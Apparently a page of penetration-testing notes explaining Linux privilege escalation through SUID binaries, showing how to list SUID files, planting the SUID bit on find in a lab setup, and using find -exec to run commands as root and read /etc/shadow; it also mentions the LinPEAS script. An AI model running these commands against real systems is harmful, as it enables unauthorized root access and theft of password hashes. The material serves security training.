Linux Privilege Escalation

Root account has full administrative access to operating system
Initial entry is through a low privilege account/shell
Target machine might have misconfigurations

SUID (Set User ID) Permission

Allows low privileged users to run exe with file system permissions of the owner (run as root)
Exe installed globally by the system
Example: Ping

Common examples are mount, cp, nano, ping

#Check permissions of ping
ls -al /bin/ping

#Output
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
#the s bit denotes that SUID permission is set

#find all executables with SUID permission set
find / -perm -u=s -type f 2>/dev/null

[Manual] Using Find to execute root commands

First we set SUID bit for executable Find (this will be our attack vector)

// Some code
#Determine location of find
which find

#check SUID bit set
ls -al /usr/bin/find

#set SUID bit on executable find
sudo chmod u+s /usr/bin/find
#we can use sudo as sudo has SUID bit set already

#now verify Find has SUID bit set
ls -al /usr/bin/find

Leverage Find to execute root commands:

#Test that we have no root privilege yet
cat /etc/shadow
Permission denied

#Now use Find, first we create dummy file
touch priv

#Now use find to execute "whoami" command (must end with \;)
find priv -exec "whoami" \;
> root

#Now execute
find priv -exec cat /etc/shadow \;

LinPeas

Linpeas.sh --> automated script for Linux Priv Escalations that runs alot of checks for vulnerabilities

searches password, writable files
Go to Interesting Files --> SUID

PreviousWindows Privilege Escalation NextPivoting

Last updated 2 years ago